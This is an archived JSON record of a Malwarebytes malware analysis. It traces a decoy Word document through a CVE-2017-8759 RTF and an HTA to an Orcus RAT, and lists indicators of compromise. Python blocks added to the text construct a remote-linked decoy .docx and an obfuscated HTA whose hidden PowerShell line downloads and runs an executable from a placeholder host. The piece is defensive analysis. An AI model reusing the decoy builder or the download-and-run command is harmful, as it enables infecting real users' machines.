{
	"id": "bde42fa9-2e61-4b20-9c9e-f0419d40e217",
	"created_at": "2026-04-06T00:11:56.219363Z",
	"updated_at": "2026-04-10T13:12:19.689949Z",
	"deleted_at": null,
	"sha1_hash": "384982de00537bbd878adc07d425551af3f6cfd0",
	"title": "Decoy Microsoft Word document delivers malware through a RAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1147218,
	"plain_text": "Decoy Microsoft Word document delivers malware through a RAT\r\nBy Jerome Segura\r\nPublished: 2017-10-13 · Archived: 2026-04-05 20:32:12 UTC\r\nIn this post, we take a look at a Microsoft Word document which is itself essentially clean, but is used to launch a multi-stage attack that relies on an externally linked object in the OpenXML package (a relationship whose target is a remote URL). That link loads a second document that contains an exploit.\r\nMost malicious Microsoft Office documents involve macros, embedded scripts, or exploits, and are typically delivered via email. In this case, simply opening the decoy Word document triggers an automatic (no click or interaction required) download of a malicious RTF file that carries an exploit for CVE-2017-8759, which in turn delivers the final malware payload.\r\nThe payload, several steps removed from the original document, is a commercial Remote Administration Tool that is used here for nefarious purposes. Victims are none the wiser because the infection runs in the background while their Word document eventually displays what looks like legitimate content.\r\nWhile the attackers could have sent the exploit-laced document directly, that might have triggered detection and quarantine at the email gateway. Instead, the benign-looking document acts as a kind of Trojan horse: it reaches the end user’s desktop and only then reveals its real intent.\r\nThe diagram below summarizes the steps this attack takes, from the original document all the way to the malware payload.\r\nhttps://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/\r\nInitial package\r\nThe initial document was reported by @xme on Twitter. 
A quick check with oletools indicates that the file is in OpenXML format and contains no macros:\r\nFILE: Product Description.docx\r\nType: OpenXML\r\nNo VBA macros found.\r\nSince OpenXML files are ZIP archives, they can be decompressed to reveal their contents:\r\n[Content_Types].xml\r\n_rels/.rels\r\nword/_rels/document.xml.rels\r\nword/document.xml\r\nword/media/image1.emf\r\nOpening document.xml.rels reveals an interesting external URL, pointing to another document.\r\nThe relationship with Id=rID6 is referenced from the main document.xml part, so it is resolved as soon as the document loads. If we open the document without network connectivity (to prevent the automatic fetch), we can spot where this object is located.\r\nThe actual exploit: CVE-2017-8759\r\nThe remote file saqlyf.doc is downloaded into the Temporary Internet Files folder and opened by Product Description.docx.\r\nThis time, the file is an RTF document.\r\nAfter converting the hexadecimal-encoded object data back to binary (with oledump), we can spot another interesting URL.\r\nAt this point, we could be looking at CVE-2017-0199 if the server had answered with a MIME type of application/hta. 
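The two manual checks described above (looking for a relationship with an external target in the .docx, and decoding the hex-encoded object data of the RTF to find the next URL) can be scripted. The block below is an added example written for this page; it is not code from the Malwarebytes post or from oletools/oledump. The sample .docx and RTF are constructed in the script, the example.invalid hostnames are placeholders, and the use of a linked OLE object relationship (type oleObject, TargetMode=External) for the decoy is an assumption about the file’s structure, since the post only shows it as a screenshot.

```python
# Added example, not code from the Malwarebytes post: a static check for the
# two artefacts described above (an external relationship in a .docx, and a URL
# hidden in the hex-encoded object data of an RTF). Sample inputs are constructed.
import io
import re
import zipfile
import xml.etree.ElementTree as ET

PKG_RELS = 'http://schemas.openxmlformats.org/package/2006/relationships'
DOC_RELS = 'http://schemas.openxmlformats.org/officeDocument/2006/relationships'
WORD_NS = 'http://schemas.openxmlformats.org/wordprocessingml/2006/main'
OFFICE_NS = 'urn:schemas-microsoft-com:office:office'
# Relationship types Word resolves while the document opens, with no click needed.
AUTO_LOAD = ('oleObject', 'attachedTemplate', 'subDocument', 'frame')
# Patterns written without backslashes so the snippet stays valid inside a JSON string.
URL_RE = re.compile('https?://[A-Za-z0-9._~:/?#@!$&()*+,;=%-]+')
HEX_RUN_RE = re.compile('[0-9A-Fa-f]{32,}')


def external_relationships(docx_bytes):
    '''List (part, Id, type, Target, auto_load) for each relationship whose
    TargetMode is External, i.e. a resource fetched from outside the archive.'''
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith('.rels'):
                continue
            for rel in ET.fromstring(zf.read(name)).iter('{%s}Relationship' % PKG_RELS):
                if rel.get('TargetMode') != 'External':
                    continue
                rtype = rel.get('Type', '').rsplit('/', 1)[-1]
                found.append((name, rel.get('Id'), rtype, rel.get('Target'), rtype in AUTO_LOAD))
    return found


def parts_referencing(docx_bytes, rid):
    '''Which XML parts carry an r:id attribute equal to rid (where the object sits).'''
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith('.xml'):
                continue
            root = ET.fromstring(zf.read(name))
            if any(el.get('{%s}id' % DOC_RELS) == rid for el in root.iter()):
                hits.append(name)
    return hits


def urls_in_rtf_objdata(rtf_text):
    '''Decode every long hex run (the objdata blob) and pull URLs out of it.'''
    urls = set()
    for run in HEX_RUN_RE.findall(rtf_text):
        blob = bytes.fromhex(run[:len(run) - len(run) % 2])
        # The link moniker may be stored as ANSI or UTF-16LE; check both.
        for text in (blob.decode('latin-1'), blob.decode('utf-16le', 'ignore')):
            urls.update(URL_RE.findall(text))
    return sorted(urls)


def _rels_xml(rels):
    '''Serialise a .rels part from (Id, Type, Target, TargetMode) tuples.'''
    root = ET.Element('Relationships', xmlns=PKG_RELS)
    for rid, rtype, target, mode in rels:
        el = ET.SubElement(root, 'Relationship', Id=rid, Type=rtype, Target=target)
        if mode:
            el.set('TargetMode', mode)
    return ET.tostring(root, encoding='unicode')


def build_sample_docx(remote='http://files.example.invalid/saqlyf.doc'):
    '''Constructed decoy: no macros, but a linked OLE object whose relationship
    target is a remote document. Hostname and relationship type are assumptions.'''
    doc = ET.Element('w:document', {'xmlns:w': WORD_NS, 'xmlns:r': DOC_RELS, 'xmlns:o': OFFICE_NS})
    run = ET.SubElement(ET.SubElement(ET.SubElement(doc, 'w:body'), 'w:p'), 'w:r')
    obj = ET.SubElement(run, 'w:object')
    ET.SubElement(obj, 'o:OLEObject', {'Type': 'Link', 'UpdateMode': 'Always', 'r:id': 'rId6'})
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
        zf.writestr('_rels/.rels', _rels_xml([('rId1', DOC_RELS + '/officeDocument', 'word/document.xml', None)]))
        zf.writestr('word/document.xml', ET.tostring(doc, encoding='unicode'))
        zf.writestr('word/_rels/document.xml.rels', _rels_xml([
            ('rId1', DOC_RELS + '/styles', 'styles.xml', None),
            ('rId6', DOC_RELS + '/oleObject', remote, 'External')]))
    return buf.getvalue()


def build_sample_rtf(remote='http://files.example.invalid/stage2'):
    '''Constructed RTF: an objautlink whose objdata hex hides the next-stage URL.'''
    bs = chr(92)  # backslash, kept out of the literal for the same JSON reason
    blob = b'StdOleLink' + bytes(8) + remote.encode() + bytes(4)
    return '{%srtf1{%sobject%sobjautlink{%sobjdata %s}}}' % (bs, bs, bs, bs, blob.hex())


if __name__ == '__main__':
    docx = build_sample_docx()
    for part, rid, rtype, target, auto in external_relationships(docx):
        used_by = parts_referencing(docx, rid)
        print('%s %s %s -> %s (auto-load: %s, used by %s)' % (part, rid, rtype, target, auto, used_by))
    print('RTF objdata URLs:', urls_in_rtf_objdata(build_sample_rtf()))
```

Run against a real sample, a hit on an auto-loading relationship type is what separates this decoy from an ordinary document with a clickable hyperlink; the second function tells you which part (here word/document.xml) embeds the object, which is where you would look with the network disconnected.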
But in this case we have something different: the WSDL content quickly reveals the SOAP WSDL parser bug in the .NET Framework tracked as CVE-2017-8759.\r\nThe code above causes the oghujp.hta file pictured below to be parsed and executed.\r\nThe nasty bit is obfuscated with ChrW() calls, but we can let VBScript do the work by evaluating the expression and printing the result in readable form.\r\nThis is the final part of the exploitation phase, and it involves running PowerShell to download and run a binary.\r\nAttack payload: a RAT\r\nThis attack was meant to install a commercial Remote Administration Tool known as Orcus RAT, which, as seen previously, was hosted on the same server as the exploit. The program is written in .NET and offers functions such as keylogging, remote desktop, and webcam access.\r\nThe payload is dropped as mozilla.exe and periodically checks in with its command-and-control infrastructure.\r\nWhile commercial RATs can be used for legitimate purposes, malicious actors often abuse them for their own sinister goals.\r\nDiversion\r\nPart of the malicious VBScript creates a fake document on the fly that is displayed to the user. If you look carefully, you will notice that the file is called Document1, so it is a new file rather than the original Product Description.docx. 
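The ChrW() obfuscation in the HTA stage can also be undone offline, without handing the script to a VBScript interpreter. The block below is an added example written for this page, not code from the Malwarebytes post: it decodes runs of ChrW(n)/Chr(n) concatenations in place and then extracts the PowerShell command line and any URLs the decoded script contains. The sample HTA is constructed by the script itself (the chrw_encode helper exists only to build it), and the example.invalid hostname and the download path are placeholders.

```python
# Added example, not from the Malwarebytes post: undo the ChrW() encoding used in
# the HTA stage and pull out the command and URLs it builds. Sample input is constructed.
import re

# A run of ChrW(n)/Chr(n) calls joined by '&'. The lookahead only swallows an '&'
# that joins two Chr calls, so an '&' joining a quoted literal survives.
# Written without backslashes so the snippet stays valid inside a JSON string.
CHR_RUN_RE = re.compile('(?:ChrW?[(][0-9]+[)](?: *& *(?=ChrW?[(]))?)+')
CHR_NUM_RE = re.compile('ChrW?[(]([0-9]+)[)]')
URL_RE = re.compile('https?://[A-Za-z0-9._~:/?#@!$&()*+,;=%-]+')


def decode_chrw(vbs):
    '''Replace every ChrW(n)&ChrW(m)... run with the text it evaluates to.'''
    def run_to_text(match):
        return ''.join(chr(int(n)) for n in CHR_NUM_RE.findall(match.group(0)))
    return CHR_RUN_RE.sub(run_to_text, vbs)


def triage_hta(hta):
    '''Decode the script and return the PowerShell lines and URLs it contains.'''
    decoded = decode_chrw(hta)
    cmds = [line.strip() for line in decoded.splitlines() if 'powershell' in line.lower()]
    return {'decoded': decoded, 'powershell': cmds, 'urls': sorted(set(URL_RE.findall(decoded)))}


def chrw_encode(text):
    '''Constructed helper producing the obfuscated form; used only to build the sample.'''
    return '&'.join('ChrW(%d)' % ord(c) for c in text)


def build_sample_hta(remote='http://files.example.invalid/aqzhnk.exe'):
    '''Constructed HTA: CreateObject and the command line are ChrW-encoded, as in the post.'''
    q = chr(39)  # single quote for the PowerShell string literals
    cmd = ('powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile({q}{u}{q},'
           '{q}C:/Users/Public/mozilla.exe{q});Start-Process {q}C:/Users/Public/mozilla.exe{q}'
           ).format(q=q, u=remote)
    lines = ['<html><head><script language=vbscript>',
             'Set sh = CreateObject(' + chrw_encode('WScript.Shell') + ')',
             'sh.Run ' + chrw_encode(cmd) + ', 0, False',
             '</script></head></html>']
    return chr(10).join(lines)


if __name__ == '__main__':
    result = triage_hta(build_sample_hta())
    print(result['decoded'])
    print('PowerShell:', result['powershell'])
    print('URLs:', result['urls'])
```

Decoding statically rather than running the script keeps the analysis off the sample’s own code path; the same regex approach extends to Chr() and to scripts that split the string over several lines, as long as the concatenation stays a plain chain of calls.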
The decoy text also contains too many typos (but that is a debate for another day).\r\nAttack infrastructure\r\nThe exploit and payload used in this attack are served from a free file hosting site, pomf[.]cat.\r\nA cursory look at the site revealed that many other malicious files are also hosted on this platform. We have reached out and requested a takedown of the offending files.\r\nScanning the original document at the gateway may not have flagged anything, given its relatively benign nature, and this is why protection at the endpoint is so important. More and more attacks these days are modular and retrieve payloads on the fly in order to evade detection.\r\nMalwarebytes users are already protected against this exploit. 
Additionally, we detect the RAT as Backdoor.NanoCore.\r\nIndicators of compromise\r\nInitial document (Product Description.docx)\r\nSHA256: 01e45e5647f103ccc99311066d0625f24e79ec8462b131d026b7a557a18d7616\r\nRTF (CVE-2017-8759)\r\na.pomf.cat/saqlyf.doc\r\nSHA256: 5758c31928c5f962fbb3ec2d07130e189a8cf4f3fbd0cd606cb1c1d165334a1c\r\nPNG (CVE-2017-8759)\r\na.pomf.cat/uczmbn.png\r\nSHA256: 5ed4582313d593a183ab0b8889dc3833c382ce9ca810287d0fcf982275b55e60\r\nHTA (CVE-2017-8759)\r\na.pomf.cat/oghujp.hta\r\nSHA256: b048a2d2ea3bb552ac6e79e37fc74576a50c79b4d8c9fd73b1276baabc465ebf\r\nPayload (RAT)\r\na.pomf.cat/aqzhnk.exe\r\nSHA256: 72041b65777a527667e73ccc5df95296f182e4787f4a349fcbe0220961dd0ed2\r\nSource: https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/"
	],
	"report_names": [
		"decoy-microsoft-word-document-delivers-malware-through-rat"
	],
	"threat_actors": [],
	"ts_created_at": 1775434316,
	"ts_updated_at": 1775826739,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/384982de00537bbd878adc07d425551af3f6cfd0.pdf",
		"text": "https://archive.orkl.eu/384982de00537bbd878adc07d425551af3f6cfd0.txt",
		"img": "https://archive.orkl.eu/384982de00537bbd878adc07d425551af3f6cfd0.jpg"
	}
}